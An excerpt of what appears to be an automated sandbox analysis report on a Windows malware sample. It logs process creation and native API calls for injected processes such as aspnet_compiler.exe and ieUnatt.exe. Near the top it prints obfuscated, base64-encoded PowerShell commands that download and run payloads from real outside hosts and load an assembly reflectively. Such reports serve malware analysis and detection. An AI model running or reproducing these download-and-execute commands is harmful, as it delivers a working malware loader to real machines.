JHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'JGhvNGJXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJFcmRlRmlOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04uZGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFtUWgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0xheVVlcUplbyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtwQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqempoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcklUU0JxeUlCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaG80Ylc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4zLzc4NC92ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ29vZC50SUYiLCIkRW52OkFQUERBVEFcdmVyeWdyZWF0dHJhZmZpY3dpdGhuaWNld29ya2luZ3NraWxsdG9iZWdvLnZiUyIsMCwwKTtzVEFydC1TTGVlcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVx2ZXJ5Z3JlYXR0cmFmZmljd2l0aG5pY2V3b3JraW5nc2tpbGx0b2JlZ28udmJTIg=='+[CHAR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = 'JGNoYXJjbyA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRjb21wb3NpdGl2byA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGFydm9yaWZvcm1lID0gJGNvbXBvc2l0aXZvLkRvd25sb2FkRGF0YSgkY2hhcmNvKTskcHJvbWV0ZWRvciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRhcnZvcmlmb3JtZSk7JGZ1c2NpdGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHRhdmlsYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JG1pbmlzdGVyaWFsbWVudGUgPSAkcHJvbWV0ZWRvci5JbmRleE9mKCRmdXNjaXRlKTskZGVzY3J1emFyID0gJHByb21ldGVkb3IuSW5kZXhPZigkdGF2aWxhKTskbWluaXN0ZXJpYWxtZW50ZSAtZ2UgMCAtYW5kICRkZXNjcnV6YXIgLWd0ICRtaW5pc3RlcmlhbG1lbnRlOyRtaW5pc3RlcmlhbG1lbnRlICs9ICRmdXNjaXRlLkxlbmd0aDskZG9pZGVqYW50ZSA9ICRkZXNjcnV6YXIgLSAkbWluaXN0ZXJpYWxtZW50ZTskY2FzY2V0YSA9ICRwcm9tZXRlZG9yLlN1YnN0cmluZygkbWluaXN0ZXJpYWxtZW50ZSwgJGRvaWRlamFudGUpOyR0cmljaGluYWRvID0gLWpvaW4gKCRjYXNjZXRhLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRjYXNjZXRhLkxlbmd0aCldOyR0cmVzY2FsYW50ZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHRyaWNoaW5hZG8pOyRkaWFsZWN0byA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHRyZXNjYWxhbnRlKTskbW9zbGVtaXRhID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JG1vc2xlbWl0YS5JbnZva2UoJG51bGwsIEAoJ3R4dC5NQVJSTUFDLzQ4Ny8zLjMyMS41NDIuMjcxLy86cHR0aCcsICckbW92ZWRvcicsICckbW92ZWRvcicsICckbW92ZWRvcicsICdhc3BuZXRfY29tcGlsZXInLCAnJG1vdmVkb3InLCAnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnJG1vdmVkb3InLCckbW92ZWRvcicsJyRtb3ZlZG9yJywnMScsJyRtb3ZlZG9yJykpOw==';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenistaJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0042BDA3 NtClose,11_2_0042BDA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092B60 NtClose,LdrInitializeThunk,11_2_01092B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_01092DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_01092C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010935C0 NtCreateMutant,LdrInitializeThunk,11_2_010935C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01094340 NtSetContextThread,11_2_01094340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01094650 NtSuspendThread,11_2_01094650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092B80 NtQueryInformationFile,11_2_01092B80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092BA0 NtEnumerateValueKey,11_2_01092BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092BE0 NtQueryValueKey,11_2_01092BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092BF0 NtAllocateVirtualMemory,11_2_01092BF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092AB0 NtWaitForSingleObject,11_2_01092AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092AD0 NtReadFile,11_2_01092AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092AF0 NtWriteFile,11_2_01092AF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092D00 NtSetInformationFile,11_2_01092D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092D10 NtMapViewOfSection,11_2_01092D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092D30 NtUnmapViewOfSection,11_2_01092D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092DB0 NtEnumerateKey,11_2_01092DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092DD0 NtDelayExecution,11_2_01092DD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092C00 NtQueryInformationProcess,11_2_01092C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092C60 NtCreateKey,11_2_01092C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092CA0 NtQueryInformationToken,11_2_01092CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092CC0 NtQueryVirtualMemory,11_2_01092CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092CF0 NtOpenProcess,11_2_01092CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092F30 NtCreateSection,11_2_01092F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092F60 NtCreateProcessEx,11_2_01092F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092F90 NtProtectVirtualMemory,11_2_01092F90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092FA0 NtQuerySection,11_2_01092FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092FB0 NtResumeThread,11_2_01092FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092FE0 NtCreateFile,11_2_01092FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092E30 NtWriteVirtualMemory,11_2_01092E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092E80 NtReadVirtualMemory,11_2_01092E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092EA0 NtAdjustPrivilegesToken,11_2_01092EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01092EE0 NtQueueApcThread,11_2_01092EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01093010 NtOpenDirectoryObject,11_2_01093010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01093090 NtSetValueKey,11_2_01093090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010939B0 NtGetContextThread,11_2_010939B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01093D10 NtOpenProcessToken,11_2_01093D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01093D70 NtOpenThread,11_2_01093D70
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048435C0 NtCreateMutant,LdrInitializeThunk,14_2_048435C0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04844650 NtSuspendThread,LdrInitializeThunk,14_2_04844650
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04844340 NtSetContextThread,LdrInitializeThunk,14_2_04844340
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04842CA0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842C60 NtCreateKey,LdrInitializeThunk,14_2_04842C60
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04842C70
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842DD0 NtDelayExecution,LdrInitializeThunk,14_2_04842DD0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04842DF0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04842D10
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_04842D30
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842E80 NtReadVirtualMemory,LdrInitializeThunk,14_2_04842E80
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842EE0 NtQueueApcThread,LdrInitializeThunk,14_2_04842EE0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842FB0 NtResumeThread,LdrInitializeThunk,14_2_04842FB0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842FE0 NtCreateFile,LdrInitializeThunk,14_2_04842FE0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842F30 NtCreateSection,LdrInitializeThunk,14_2_04842F30
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_048439B0 NtGetContextThread,LdrInitializeThunk,14_2_048439B0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842AD0 NtReadFile,LdrInitializeThunk,14_2_04842AD0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842AF0 NtWriteFile,LdrInitializeThunk,14_2_04842AF0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842BA0 NtEnumerateValueKey,LdrInitializeThunk,14_2_04842BA0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04842BE0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04842BF0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842B60 NtClose,LdrInitializeThunk,14_2_04842B60
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04843090 NtSetValueKey,14_2_04843090
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04843010 NtOpenDirectoryObject,14_2_04843010
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842CC0 NtQueryVirtualMemory,14_2_04842CC0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842CF0 NtOpenProcess,14_2_04842CF0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842C00 NtQueryInformationProcess,14_2_04842C00
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842DB0 NtEnumerateKey,14_2_04842DB0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842D00 NtSetInformationFile,14_2_04842D00
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04843D10 NtOpenProcessToken,14_2_04843D10
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04843D70 NtOpenThread,14_2_04843D70
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842EA0 NtAdjustPrivilegesToken,14_2_04842EA0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842E30 NtWriteVirtualMemory,14_2_04842E30
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842F90 NtProtectVirtualMemory,14_2_04842F90
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842FA0 NtQuerySection,14_2_04842FA0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842F60 NtCreateProcessEx,14_2_04842F60
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842AB0 NtWaitForSingleObject,14_2_04842AB0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_04842B80 NtQueryInformationFile,14_2_04842B80
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02948B20 NtReadFile,14_2_02948B20
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_029489C0 NtCreateFile,14_2_029489C0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02948E00 NtAllocateVirtualMemory,14_2_02948E00
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02948CB0 NtClose,14_2_02948CB0
                  Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 14_2_02948C10 NtDeleteFile,14_2_02948C10
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04A987B08_2_04A987B0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04A97FE48_2_04A97FE4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00417ED311_2_00417ED3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040100011_2_00401000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040F80311_2_0040F803
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004160B311_2_004160B3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040126011_2_00401260
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040FA2311_2_0040FA23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402ADD11_2_00402ADD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402AE011_2_00402AE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040DAA311_2_0040DAA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040234011_2_00402340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0042E33311_2_0042E333
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040233411_2_00402334
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00402E7011_2_00402E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040F7FA11_2_0040F7FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105010011_2_01050100
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FA11811_2_010FA118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E815811_2_010E8158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011141A211_2_011141A2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011201AA11_2_011201AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011181CC11_2_011181CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F200011_2_010F2000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111A35211_2_0111A352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011203E611_2_011203E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106E3F011_2_0106E3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110027411_2_01100274
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010E02C011_2_010E02C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106053511_2_01060535
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0112059111_2_01120591
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110442011_2_01104420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111244611_2_01112446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110E4F611_2_0110E4F6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108475011_2_01084750
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106077011_2_01060770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105C7C011_2_0105C7C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107C6E011_2_0107C6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107696211_2_01076962
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010629A011_2_010629A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0112A9A611_2_0112A9A6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106284011_2_01062840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106A84011_2_0106A840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010468B811_2_010468B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0108E8F011_2_0108E8F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111AB4011_2_0111AB40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01116BD711_2_01116BD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105EA8011_2_0105EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106AD0011_2_0106AD00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FCD1F11_2_010FCD1F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01078DBF11_2_01078DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105ADE011_2_0105ADE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060C0011_2_01060C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01100CB511_2_01100CB5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01050CF211_2_01050CF2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01102F3011_2_01102F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A2F2811_2_010A2F28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01080F3011_2_01080F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D4F4011_2_010D4F40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010DEFA011_2_010DEFA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01052FC811_2_01052FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106CFE011_2_0106CFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111EE2611_2_0111EE26
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01060E5911_2_01060E59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111CE9311_2_0111CE93
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01072E9011_2_01072E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111EEDB11_2_0111EEDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0109516C11_2_0109516C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104F17211_2_0104F172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0112B16B11_2_0112B16B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0106B1B011_2_0106B1B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010670C011_2_010670C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0110F0CC11_2_0110F0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111F0E011_2_0111F0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011170E911_2_011170E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111132D11_2_0111132D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104D34C11_2_0104D34C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010A739A11_2_010A739A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010652A011_2_010652A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107B2C011_2_0107B2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_011012ED11_2_011012ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111757111_2_01117571
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010FD5B011_2_010FD5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0111F43F11_2_0111F43F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0105146011_2_01051460
